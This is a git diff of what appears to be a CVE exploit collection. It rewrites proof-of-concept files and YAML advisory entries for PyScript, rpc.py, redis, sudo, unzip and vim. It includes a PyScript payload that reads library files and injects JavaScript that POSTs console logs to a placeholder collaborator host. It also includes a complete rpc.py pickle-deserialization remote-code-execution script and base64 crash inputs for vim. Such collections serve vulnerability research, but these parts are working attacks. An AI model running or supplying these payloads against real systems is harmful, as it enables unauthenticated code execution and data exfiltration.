   tags: cve2021, 未加控制的资源消耗（资源穷尽）
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt
index c9a9c288..5df5b8b9 100644
--- a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt
+++ b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt
@@ -1,18 +1,18 @@
-# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
-Source Codes Read
-# Date: 5-9-2022
-# Exploit Author: Momen Eldawakhly (Cyber Guy)
-# Vendor Homepage: https://pyscript.net/
-# Software Link: https://github.com/pyscript/pyscript
-# Version: 2022-05-04-Alpha
-# Tested on: Ubuntu Apache Server
-# CVE : CVE-2022-30286
-
-<py-script>
-x = "CyberGuy"
-if x == "CyberGuy":
-    with open('/lib/python3.10/asyncio/tasks.py') as output:
-        contents = output.read()
-        print(contents)
-print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
+# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
+Source Codes Read
+# Date: 5-9-2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://pyscript.net/
+# Software Link: https://github.com/pyscript/pyscript
+# Version: 2022-05-04-Alpha
+# Tested on: Ubuntu Apache Server
+# CVE : CVE-2022-30286
+
+<py-script>
+x = "CyberGuy"
+if x == "CyberGuy":
+    with open('/lib/python3.10/asyncio/tasks.py') as output:
+        contents = output.read()
+        print(contents)
+print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
 </py-script>
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-30286/README.md b/cve/python/2022/CVE-2022-30286/README.md
index 68e763a9..bae1fb18 100644
--- a/cve/python/2022/CVE-2022-30286/README.md
+++ b/cve/python/2022/CVE-2022-30286/README.md
@@ -1,25 +1,25 @@
-# PyScript Remote Emscripten VMemory Python libraries
-Date: 5-9-2022  
-Exploit Author: Momen Eldawakhly (Cyber Guy)  
-Vendor Homepage: https://pyscript.net/  
-Software Link: https://github.com/pyscript/pyscript  
-Version: 2022-05-04-Alpha  
-Tested on: Ubuntu Apache Server  
-CVE : CVE-2022-30286
-# Poc
-```
-<py-script>
-x = "CyberGuy"
-if x == "CyberGuy":
-    with open('/lib/python3.10/asyncio/tasks.py') as output:
-        contents = output.read()
-        print(contents)
-print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
-</py-script>
-```
-# reference
-http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html  
-https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript  
-https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read  
-https://github.com/pyscript/pyscript/commits/main  
+# PyScript Remote Emscripten VMemory Python libraries
+Date: 5-9-2022  
+Exploit Author: Momen Eldawakhly (Cyber Guy)  
+Vendor Homepage: https://pyscript.net/  
+Software Link: https://github.com/pyscript/pyscript  
+Version: 2022-05-04-Alpha  
+Tested on: Ubuntu Apache Server  
+CVE : CVE-2022-30286
+# Poc
+```
+<py-script>
+x = "CyberGuy"
+if x == "CyberGuy":
+    with open('/lib/python3.10/asyncio/tasks.py') as output:
+        contents = output.read()
+        print(contents)
+print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
+</py-script>
+```
+# reference
+http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html  
+https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript  
+https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read  
+https://github.com/pyscript/pyscript/commits/main  
 https://www.exploit-db.com/exploits/50918  
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py
index 467cc175..1ea07853 100644
--- a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py
+++ b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py
@@ -1,52 +1,52 @@
-# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
-# Google Dork: N/A
-# Date: 2022-07-12
-# Exploit Author: Elias Hohl
-# Vendor Homepage: https://github.com/abersheeran
-# Software Link: https://github.com/abersheeran/rpc.py
-# Version: v0.4.2 - v0.6.0
-# Tested on: Debian 11, Ubuntu 20.04
-# CVE : CVE-2022-35411
-
-import requests
-import pickle
-
-# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
-
-HOST =3D "127.0.0.1:65432"
-
-URL =3D f"http://{HOST}/sayhi"
-
-HEADERS =3D {
-    "serializer": "pickle"
-}
-
-
-def generate_payload(cmd):
-
-    class PickleRce(object):
-        def __reduce__(self):
-            import os
-            return os.system, (cmd,)
-
-    payload =3D pickle.dumps(PickleRce())
-
-    print(payload)
-
-    return payload
-
-
-def exec_command(cmd):
-
-    payload =3D generate_payload(cmd)
-
-    requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
-
-
-def main():
-    exec_command('curl http://127.0.0.1:4321')
-    # exec_command('uname -a')
-
-
-if __name__ =3D=3D "__main__":
+# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 2022-07-12
+# Exploit Author: Elias Hohl
+# Vendor Homepage: https://github.com/abersheeran
+# Software Link: https://github.com/abersheeran/rpc.py
+# Version: v0.4.2 - v0.6.0
+# Tested on: Debian 11, Ubuntu 20.04
+# CVE : CVE-2022-35411
+
+import requests
+import pickle
+
+# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
+
+HOST =3D "127.0.0.1:65432"
+
+URL =3D f"http://{HOST}/sayhi"
+
+HEADERS =3D {
+    "serializer": "pickle"
+}
+
+
+def generate_payload(cmd):
+
+    class PickleRce(object):
+        def __reduce__(self):
+            import os
+            return os.system, (cmd,)
+
+    payload =3D pickle.dumps(PickleRce())
+
+    print(payload)
+
+    return payload
+
+
+def exec_command(cmd):
+
+    payload =3D generate_payload(cmd)
+
+    requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
+
+
+def main():
+    exec_command('curl http://127.0.0.1:4321')
+    # exec_command('uname -a')
+
+
+if __name__ =3D=3D "__main__":
     main()
\ No newline at end of file
diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md
index fbc23347..25db92b4 100644
--- a/cve/python/2022/CVE-2022-35411/README.md
+++ b/cve/python/2022/CVE-2022-35411/README.md
@@ -1,18 +1,18 @@
-# rpc.py 0.6.0 - Remote Code Execution (RCE)
-Google Dork: N/A  
-Date: 2022-07-12  
-Exploit Author: Elias Hohl  
-Vendor Homepage: https://github.com/abersheeran  
-Software Link: https://github.com/abersheeran/rpc.py  
-Version: v0.4.2 - v0.6.0  
-Tested on: Debian 11, Ubuntu 20.04  
-CVE : CVE-2022-35411  
-# Usage
-```
-python CVE-2022-35411.py  
-```
-# reference
-http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html 
-https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd	Patch  Third Party Advisory 
-https://github.com/ehtec/rpcpy-exploit	Third Party Advisory 
+# rpc.py 0.6.0 - Remote Code Execution (RCE)
+Google Dork: N/A  
+Date: 2022-07-12  
+Exploit Author: Elias Hohl  
+Vendor Homepage: https://github.com/abersheeran  
+Software Link: https://github.com/abersheeran/rpc.py  
+Version: v0.4.2 - v0.6.0  
+Tested on: Debian 11, Ubuntu 20.04  
+CVE : CVE-2022-35411  
+# Usage
+```
+python CVE-2022-35411.py  
+```
+# reference
+http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html 
+https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd	Patch  Third Party Advisory 
+https://github.com/ehtec/rpcpy-exploit	Third Party Advisory 
 https://medium.com/@elias.hohl/remote-code-execution-0-day-in-rpc-py-709c76690c30
\ No newline at end of file
diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml
index 613b5007..3d2d3f07 100644
--- a/cve/python/2022/yaml/CVE-2022-30286.yaml
+++ b/cve/python/2022/yaml/CVE-2022-30286.yaml
@@ -1,24 +1,24 @@
-id: CVE-2022-30286
-source: https://www.exploit-db.com/exploits/50918
-info:
-  name: PyScript Remote Emscripten VMemory Python libraries
-  severity: critical
-  description:
-    pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.
-  scope-of-influence:
-      PyScript < v2.3
-  reference:
-    - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
-    - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
-    - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
-    - https://github.com/pyscript/pyscript/commits/main
-    - https://www.exploit-db.com/exploits/50918
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
-    cve-id: CVE-2022-30286
-    cwe-id: None
-    cnvd-id: None
-    kve-id: None
-  tags: 
+id: CVE-2022-30286
+source: https://www.exploit-db.com/exploits/50918
+info:
+  name: PyScript Remote Emscripten VMemory Python libraries
+  severity: critical
+  description:
+    pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.
+  scope-of-influence:
+      PyScript < v2.3
+  reference:
+    - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
+    - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
+    - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
+    - https://github.com/pyscript/pyscript/commits/main
+    - https://www.exploit-db.com/exploits/50918
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-30286
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
+  tags: 
     - Source Codes Read
\ No newline at end of file
diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml
index 3e14c184..c8e145a5 100644
--- a/cve/python/2022/yaml/CVE-2022-35411.yaml
+++ b/cve/python/2022/yaml/CVE-2022-35411.yaml
@@ -1,22 +1,22 @@
-id: CVE-2022-35411
-source: https://www.exploit-db.com/exploits/50983
-info:
-  name: python中的rpc库，rpc是远程过程调用（Remote Procedure Call）的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机，而服务提供程序就是一个服务器。首先，调用进程发送一个有进程参数的调用信息到服务进程，然后等待应答信息。在服务器端，进程保持睡眠状态直到调用信息的到达为止。获得进程结果，然后调用执行继续进行。
-  severity: critical
-  description:
-    rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.
-  scope-of-influence:
-     rpc.py v0.4.2 - v0.6.0
-  reference:
-    - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html
-    - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd
-    - https://github.com/ehtec/rpcpy-exploit
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cve-id: CVE-2022-35411
-    cwe-id: None
-    cnvd-id: None
-    kve-id: None
-  tags: 
-    - 远程代码执行
+id: CVE-2022-35411
+source: https://www.exploit-db.com/exploits/50983
+info:
+  name: python中的rpc库，rpc是远程过程调用（Remote Procedure Call）的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机，而服务提供程序就是一个服务器。首先，调用进程发送一个有进程参数的调用信息到服务进程，然后等待应答信息。在服务器端，进程保持睡眠状态直到调用信息的到达为止。获得进程结果，然后调用执行继续进行。
+  severity: critical
+  description:
+    rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle.
+  scope-of-influence:
+     rpc.py v0.4.2 - v0.6.0
+  reference:
+    - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html
+    - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd
+    - https://github.com/ehtec/rpcpy-exploit
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-35411
+    cwe-id: None
+    cnvd-id: None
+    kve-id: None
+  tags: 
+    - 远程代码执行
diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml
index 7b5dcafb..7b0a82da 100644
--- a/cve/redis/2022/yaml/CVE-2022-31144.yaml
+++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml
@@ -1,24 +1,24 @@
-id: CVE-2022-31144
-source: 
-  https://github.com/SpiralBL0CK/CVE-2022-31144
-info:
-  name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力.
-  severity: High
-  description: |
-    Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.
-  scope-of-influence:
-    7.0 <= redis < 7.0.4
-  reference:
-    - https://github.com/redis/redis/releases/tag/7.0.4
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-31144
-    - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh
-    - https://security.gentoo.org/glsa/202209-17
-    - https://security.netapp.com/advisory/ntap-20220909-0002/
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
-    cve-id: CVE-2022-31144
-    cwe-id: CWE-787, CWE-122
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-31144
+source: 
+  https://github.com/SpiralBL0CK/CVE-2022-31144
+info:
+  name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力.
+  severity: High
+  description: |
+    Redis 是一个内存中数据库, 它保留在磁盘上. 在特定状态下对流密钥的特制“XAUTOCLAIM”命令可能会导致堆溢出, 并可能导致远程代码执行. 此问题会影响 7.7.0 之前的 4.x 分支上的版本. 该修补程序在版本 7.0.4 中发布.
+  scope-of-influence:
+    7.0 <= redis < 7.0.4
+  reference:
+    - https://github.com/redis/redis/releases/tag/7.0.4
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31144
+    - https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh
+    - https://security.gentoo.org/glsa/202209-17
+    - https://security.netapp.com/advisory/ntap-20220909-0002/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-31144
+    cwe-id: CWE-787, CWE-122
+    cnvd-id: None
+    kve-id: None
   tags: 堆溢出, 远程代码执行
\ No newline at end of file
diff --git a/cve/sudo/2019/CVE-2019-18634/.gitignore b/cve/sudo/2019/CVE-2019-18634/.gitignore
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/LICENSE b/cve/sudo/2019/CVE-2019-18634/LICENSE
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/Makefile b/cve/sudo/2019/CVE-2019-18634/Makefile
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/README.md b/cve/sudo/2019/CVE-2019-18634/README.md
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/CVE-2019-18634/exploit.c b/cve/sudo/2019/CVE-2019-18634/exploit.c
old mode 100755
new mode 100644
diff --git a/cve/sudo/2019/yaml/CVE-2019-14287.yaml b/cve/sudo/2019/yaml/CVE-2019-14287.yaml
index 3abae8b7..9eee215b 100644
--- a/cve/sudo/2019/yaml/CVE-2019-14287.yaml
+++ b/cve/sudo/2019/yaml/CVE-2019-14287.yaml
@@ -1,20 +1,20 @@
-id: CVE-2019-14287
-source: https://github.com/n0w4n/CVE-2019-14287
-info:
-  name: Sudo是一款使用于类Unix系统的，允许用户通过安全的方式使用特殊的权限执行命令的程序。
-  severity: high
-  description: |
-    在1.8.28之前的Sudo中，访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块，并使用精心设计的用户ID调用Sudo，从而导致错误的日志记录。例如，对于"sudo -u \#$((0xffffffff))"命令，这允许绕过!root和USER=logging。
-  scope-of-influence:
-    sudo < 1.8.28
-  reference:
-    - https://access.redhat.com/security/cve/cve-2019-14287
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-14287
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
-    cve-id: CVE-2019-14287
-    cwe-id: CWE-755
-    cnvd-id: None
-    kve-id: None
-  tags: CVE-2019-14287, sudo
+id: CVE-2019-14287
+source: https://github.com/n0w4n/CVE-2019-14287
+info:
+  name: Sudo是一款使用于类Unix系统的，允许用户通过安全的方式使用特殊的权限执行命令的程序。
+  severity: high
+  description: |
+    在1.8.28之前的Sudo中，访问Runas ALL sudoer帐户的攻击者可以绕过某些策略黑名单和会话PAM模块，并使用精心设计的用户ID调用Sudo，从而导致错误的日志记录。例如，对于"sudo -u \#$((0xffffffff))"命令，这允许绕过!root和USER=logging。
+  scope-of-influence:
+    sudo < 1.8.28
+  reference:
+    - https://access.redhat.com/security/cve/cve-2019-14287
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-14287
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-14287
+    cwe-id: CWE-755
+    cnvd-id: None
+    kve-id: None
+  tags: CVE-2019-14287, sudo
diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml
index 8fad7320..044f24e4 100644
--- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml
+++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml
@@ -1,20 +1,20 @@
-id: CVE-2023-22809
-source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
-info:
-    name: Sudo 是一个用于类 Unix 计算机操作系统的程序，它能够使用户能够以另一个用户（默认是超级用户）的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
-    severity: high
-    description:
-        Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞，漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤，导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
-    scope-of-influence:
-        sudo@[1.8.0, 1.9.12p2)
-    references:
-        - https://nvd.nist.gov/vuln/detail/CVE-2023-22809
-    classification:
-        cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-        cvss-score: 7.8
-        cve-id: CVE-2023-22809
-        cwe-id: CWE-269
-        cnvd-id: None
-        kve-id: None
-    tags:
+id: CVE-2023-22809
+source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
+info:
+    name: Sudo 是一个用于类 Unix 计算机操作系统的程序，它能够使用户能够以另一个用户（默认是超级用户）的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
+    severity: high
+    description:
+        Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞，漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤，导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
+    scope-of-influence:
+        sudo@[1.8.0, 1.9.12p2)
+    references:
+        - https://nvd.nist.gov/vuln/detail/CVE-2023-22809
+    classification:
+        cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+        cvss-score: 7.8
+        cve-id: CVE-2023-22809
+        cwe-id: CWE-269
+        cnvd-id: None
+        kve-id: None
+    tags:
         - 特权管理不当
\ No newline at end of file
diff --git a/cve/unzip/2022/yaml/CVE-2022-0529.yaml b/cve/unzip/2022/yaml/CVE-2022-0529.yaml
index 7838180f..c24d3bac 100644
--- a/cve/unzip/2022/yaml/CVE-2022-0529.yaml
+++ b/cve/unzip/2022/yaml/CVE-2022-0529.yaml
@@ -1,19 +1,19 @@
-id: CVE-2022-0529
-source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529
-info:
-  name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。
-  severity: MEDIUM
-  description: 
-    A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.
-  scope-of-influence:
-    unzip Up to (excluding) 6.0-r11
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0529
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
-    cvss-score: 5.5 
-    cve-id: CVE-2022-0529
-    cwe-id: CWE-787
-    cnvd-id: None
-    kve-id: None
+id: CVE-2022-0529
+source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529
+info:
+  name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。
+  severity: MEDIUM
+  description: 
+    A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.
+  scope-of-influence:
+    unzip Up to (excluding) 6.0-r11
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0529
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
+    cvss-score: 5.5 
+    cve-id: CVE-2022-0529
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
   tags: CVE-2022, unzip
\ No newline at end of file
diff --git a/cve/vim/2021/CVE-2021-3778/other_poc.txt b/cve/vim/2021/CVE-2021-3778/other_poc.txt
index a0d7e453..c86353be 100644
--- a/cve/vim/2021/CVE-2021-3778/other_poc.txt
+++ b/cve/vim/2021/CVE-2021-3778/other_poc.txt
@@ -1,6 +1,6 @@
-1.
-echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt
-vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa!
-2.
-echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt
+1.
+echo "bGMKc2YICnJldDgwMDAwMDAwMDAwMDAwMDAwMDAw" | base64 -d \> fuzz448.txt
+vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa!
+2.
+echo "Ywp2XTCqCi4KeQpAMA==" | base64 -d > fuzz000.txt
 vim -u NONE -X -Z -e -s -S fuzz000.txt -c :qa!
\ No newline at end of file
diff --git a/cve/vim/2021/CVE-2021-3778/readme.md b/cve/vim/2021/CVE-2021-3778/readme.md
index fa732e1b..3f0cee11 100644
--- a/cve/vim/2021/CVE-2021-3778/readme.md
+++ b/cve/vim/2021/CVE-2021-3778/readme.md
@@ -1,11 +1,11 @@
-Exact steps we followed to find this bug:
-
-1 -- git clone https://github.com/vim/vim
-
-2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
-
-3 -- make
-
-4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt
-
+Exact steps we followed to find this bug:
+
+1 -- git clone https://github.com/vim/vim
+
+2 -- LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
+
+3 -- make
+
+4 -- echo "c3YQIwhlZmllZAAuSgoxUmVzZXJ2F2QgU3RkaW5ngmluZwEAAABAAAAAZGmAAABzCiMKIwlThnJp bmeRIHdoRjk5NDI5OSk5OTk5OTk5OTk5YzEl////YmQgCv4JCgovMAPoCgPoZEVmaVZlZAqSAIBl Ly8vLy8QZgp1RykKAQAKbGMKCi4wKi4ALkwKMSwwIwlVZXNlcnZlZCBTdGJpbgowLi8uMC8wCi0y MTQ3NHz///84LykxCkw5dQoDq/8KCnVuaWz4CiMKIwosCnN2EGYI/1xsAAAKcnYQ5C0ugP///zER TAp0cnVlRWUwClN2YAogAIBlZgpwdQpyZXQ4NTU4NTk5OTk5OTk5OTk5OTk5OTk5NTU1NTU1NTU1" | base64 -d > fuzz448.txt
+
 5 -- vim -u NONE -X -Z -e -s -S fuzz448.txt -c :qa!
\ No newline at end of file
diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml
index a009ea6b..d847d833 100644
--- a/cve/vim/2021/yaml/CVE-2021-3778.yaml
+++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-3778
-source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
-info:
-  name: vim: Heap-based Buffer Overflow in ex_retab()
-  severity: 
-    HIGH
-  description: |
-    vim容易受到基于堆的缓冲区溢出的攻击
-  scope-of-influence:
-    vim = 8.2
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-3778
-    - https://www.openwall.com/lists/oss-security/2021/10/01/1
-    - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2021-3778
-    cwe-id: CWE-787, CWE-122
-    cnvd-id: None
-    kve-id: None
+id: CVE-2021-3778
+source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
+info:
+  name: vim: Heap-based Buffer Overflow in ex_retab()
+  severity: 
+    HIGH
+  description: |
+    vim容易受到基于堆的缓冲区溢出的攻击
+  scope-of-influence:
+    vim = 8.2
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3778
+    - https://www.openwall.com/lists/oss-security/2021/10/01/1
+    - https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-3778
+    cwe-id: CWE-787, CWE-122
+    cnvd-id: None
+    kve-id: None
   tags: 堆缓冲区溢出
\ No newline at end of file
diff --git a/cve/vim/2023/CVE-2023-0288/readme.md b/cve/vim/2023/CVE-2023-0288/readme.md
index 5ad3db9d..c7b58182 100644
--- a/cve/vim/2023/CVE-2023-0288/readme.md
+++ b/cve/vim/2023/CVE-2023-0288/readme.md
@@ -1,101 +1,101 @@
-#### 描述
-
-memline.c:2951处函数ml_append_int中基于堆的缓冲区溢出
-
-#### 影响版本
-
-```
-git log
